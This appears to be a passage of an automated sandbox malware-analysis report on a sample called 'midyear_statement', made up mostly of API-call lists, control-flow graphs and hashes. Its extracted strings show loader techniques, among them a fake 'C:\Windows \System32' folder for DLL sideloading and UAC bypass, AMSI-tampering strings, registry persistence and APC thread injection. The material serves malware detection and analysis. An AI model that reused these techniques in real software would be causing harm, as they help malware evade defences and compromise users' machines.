                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFromInstanceProg
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2151042543-0
                                                                                                                                                                                          • Opcode ID: 5505bfa204f4360921e6f2f29ba782843f3ffba17eaab6a7d54a118d9d41999d
                                                                                                                                                                                          • Instruction ID: c6ac30f4d11e2e3045e9bb4db3d817d377a8ad8f13a2d90b5c62e6b1e34bba93
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5505bfa204f4360921e6f2f29ba782843f3ffba17eaab6a7d54a118d9d41999d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8601F730A087086FE715DFA4DC629EF7BACE749718B510835F504F2640EA316910C8EA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040C225E Relevance: 46.4, APIs: 6, Strings: 19, Instructions: 2660fileprocesssleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                            • Part of subcall function 040BCD1C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
                                                                                                                                                                                            • Part of subcall function 040A7DD4: GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
                                                                                                                                                                                          • WinExec.KERNEL32(00000000,040C9BC4), ref: 040C3438
                                                                                                                                                                                          • Sleep.KERNEL32(00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c ",00000000,UacInitialize,04100344), ref: 040C35B6
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c ",00000000,UacInitialize), ref: 040C35EA
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c ",00000000), ref: 040C3624
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,OpenSession,04100344,040C9768,UacInitialize,04100344,040C9768,ScanString,04100344,040C9768,00000000,040C9BC4,cmd /c "), ref: 040C365E
                                                                                                                                                                                          • WinExec.KERNEL32(00000000,040C9C7C), ref: 040C4691
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Delete$ExecPath$AddressAttributesCloseCreateHandleLibraryLoadModuleNameName_ProcSleepWrite
                                                                                                                                                                                          • String ID: .exe$.url$C:\Users\Public\$C:\Windows \System32\$C:\Windows \System32\KDECO.bat$C:\Windows \System32\netutils.dll$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$cmd /c "
                                                                                                                                                                                          • API String ID: 693508201-254220744
                                                                                                                                                                                          • Opcode ID: 37a235da111725a8be751d9b82f1af57908cad11c3025bead4976d8b4d51b0ee
                                                                                                                                                                                          • Instruction ID: 18ff4525b3411e58f825c100a069db8f8101ed8f037b4a8b07ac26aa56981386
                                                                                                                                                                                          • Opcode Fuzzy Hash: 37a235da111725a8be751d9b82f1af57908cad11c3025bead4976d8b4d51b0ee
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8343ED39A511598FEB10EBA4D980FCEB3B5EF8560CF1446E5A008BB610DBB4BE95CF41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040C5222 Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 941processCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 10771 40c5222-40c597f call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a4910 call 40a4668 call 40bd598 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a485c 10982 40c64b4-40c66b3 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a485c 10771->10982 10983 40c5985-40c5fd7 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a475c call 40a4910 WinExec call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4910 call 40a4668 call 40b9e10 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a3664 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 10771->10983 11101 40c72bf-40c7442 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a485c 10982->11101 11102 40c66b9-40c688c call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a475c call 40a4910 call 40a4ce4 call 40a4d60 CreateProcessAsUserW 10982->11102 11559 40c5fde-40c62bc call 40b5a30 call 40a4b3c call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4968 RtlMoveMemory call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40ba160 call 40a3694 10983->11559 11560 40c5fd9-40c5fdc 10983->11560 11237 40c7448-40c7457 call 40a485c 11101->11237 11238 40c7c13-40c9301 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 * 16 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a4668 * 2 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 ExitProcess 11101->11238 11259 40c688e-40c6905 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 11102->11259 11260 40c690a-40c6a15 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 11102->11260 11237->11238 11247 40c745d-40c7730 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40bd418 call 40a47d0 call 40a4910 call 40a4668 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a7dd4 11237->11247 11586 40c7a0d-40c7c0e call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4968 call 40b7ee8 11247->11586 11587 40c7736-40c7a08 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40bd070 call 40a44c4 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a4d50 * 2 call 40a46f8 call 40bcd1c 11247->11587 11259->11260 11391 40c6a1c-40c6d3c call 40a4968 call 40bcee0 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40bc20c call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 11260->11391 11392 40c6a17-40c6a1a 11260->11392 11795 40c6d3e-40c6d50 NtQueueApcThread 11391->11795 11796 40c6d55-40c72ba call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 ResumeThread call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 CloseHandle call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 call 40a47d0 call 40a4910 call 40a4668 call 40a475c call 40a4910 call 40a4668 call 40b7b88 11391->11796 11392->11391 11560->11559 11586->11238 11587->11586 11795->11796 11796->11101
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                            • Part of subcall function 040BD598: RegOpenKeyA.ADVAPI32(?,00000000,041F48C8), ref: 040BD5DC
                                                                                                                                                                                            • Part of subcall function 040BD598: RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD614
                                                                                                                                                                                            • Part of subcall function 040BD598: RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD61F
                                                                                                                                                                                          • WinExec.KERNEL32(00000000,00000000), ref: 040C5B1D
                                                                                                                                                                                            • Part of subcall function 040B9E10: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 040B9ED3
                                                                                                                                                                                          • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,04100344,040C9768,UacScan,04100344,040C9768,OpenSession,04100344,040C9768,OpenSession,04100344,040C9768), ref: 040C609F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                                                                                          • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                                                                          • API String ID: 897696978-872072817
                                                                                                                                                                                          • Opcode ID: 7709b78fe94aedee2ffe67b0b40eb60f5718656f5af43a7ddb28b9fde174e24e
                                                                                                                                                                                          • Instruction ID: 7e7dc9536782209da19b223ae2d0cc7d3775e22953a15af52f612677ccee3e3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7709b78fe94aedee2ffe67b0b40eb60f5718656f5af43a7ddb28b9fde174e24e
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF921B38A411598FE720EBA4D980EDEB3F9EB85308F1445F5A048BB614DBB4BE95CF41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040A1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 12604 40a1724-40a1736 12605 40a1968-40a196d 12604->12605 12606 40a173c-40a174c 12604->12606 12607 40a1973-40a1984 12605->12607 12608 40a1a80-40a1a83 12605->12608 12609 40a174e-40a175b 12606->12609 12610 40a17a4-40a17ad 12606->12610 12611 40a1938-40a1945 12607->12611 12612 40a1986-40a19a2 12607->12612 12614 40a1a89-40a1a8b 12608->12614 12615 40a1684-40a16ad VirtualAlloc 12608->12615 12616 40a175d-40a176a 12609->12616 12617 40a1774-40a1780 12609->12617 12610->12609 12613 40a17af-40a17bb 12610->12613 12611->12612 12618 40a1947-40a195b Sleep 12611->12618 12623 40a19b0-40a19bf 12612->12623 12624 40a19a4-40a19ac 12612->12624 12613->12609 12625 40a17bd-40a17c9 12613->12625 12626 40a16df-40a16e5 12615->12626 12627 40a16af-40a16dc call 40a1644 12615->12627 12619 40a176c-40a1770 12616->12619 12620 40a1794-40a17a1 12616->12620 12621 40a1782-40a1790 12617->12621 12622 40a17f0-40a17f9 12617->12622 12618->12612 12628 40a195d-40a1964 Sleep 12618->12628 12633 40a17fb-40a1808 12622->12633 12634 40a182c-40a1836 12622->12634 12630 40a19d8-40a19e0 12623->12630 12631 40a19c1-40a19d5 12623->12631 12629 40a1a0c-40a1a22 12624->12629 12625->12609 12632 40a17cb-40a17de Sleep 12625->12632 12627->12626 12628->12611 12640 40a1a3b-40a1a47 12629->12640 12641 40a1a24-40a1a32 12629->12641 12637 40a19fc-40a19fe call 40a15cc 12630->12637 12638 40a19e2-40a19fa 12630->12638 12631->12629 12632->12609 12636 40a17e4-40a17eb Sleep 12632->12636 12633->12634 12639 40a180a-40a181e Sleep 12633->12639 12642 40a18a8-40a18b4 12634->12642 12643 40a1838-40a1863 12634->12643 12636->12610 12649 40a1a03-40a1a0b 12637->12649 12638->12649 12639->12634 12651 40a1820-40a1827 Sleep 12639->12651 12645 40a1a68 12640->12645 12646 40a1a49-40a1a5c 12640->12646 12641->12640 12652 40a1a34 12641->12652 12647 40a18dc-40a18eb call 40a15cc 12642->12647 12648 40a18b6-40a18c8 12642->12648 12653 40a187c-40a188a 12643->12653 12654 40a1865-40a1873 12643->12654 12657 40a1a6d-40a1a7f 12645->12657 12656 40a1a5e-40a1a63 call 40a1500 12646->12656 12646->12657 12665 40a18fd-40a1936 12647->12665 12669 40a18ed-40a18f7 12647->12669 12660 40a18ca 12648->12660 12661 40a18cc-40a18da 12648->12661 12651->12633 12652->12640 12658 40a18f8 12653->12658 12659 40a188c-40a18a6 call 40a1500 12653->12659 12654->12653 12655 40a1875 12654->12655 12655->12653 12656->12657 12658->12665 12659->12665 12660->12661 12661->12665
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,040A1FC1), ref: 040A17D0
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,040A1FC1), ref: 040A17E6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                          • Opcode ID: 31e6b3f594db8c71bf61228af07e952956d9025903babca37a159df0a7d6f0d4
                                                                                                                                                                                          • Instruction ID: b3a90d60549a8dbb959ffbe793c1bcc2b28dd4bb2a13d44be15b015059557dc8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 31e6b3f594db8c71bf61228af07e952956d9025903babca37a159df0a7d6f0d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 72B143726007518BCB15CFA8D880B59FBE0EF85354F1882BED406AF385E738B861CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 040B7AC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B01
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32), ref: 040B7B07
                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B21
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID: irtualProtect$kernel32
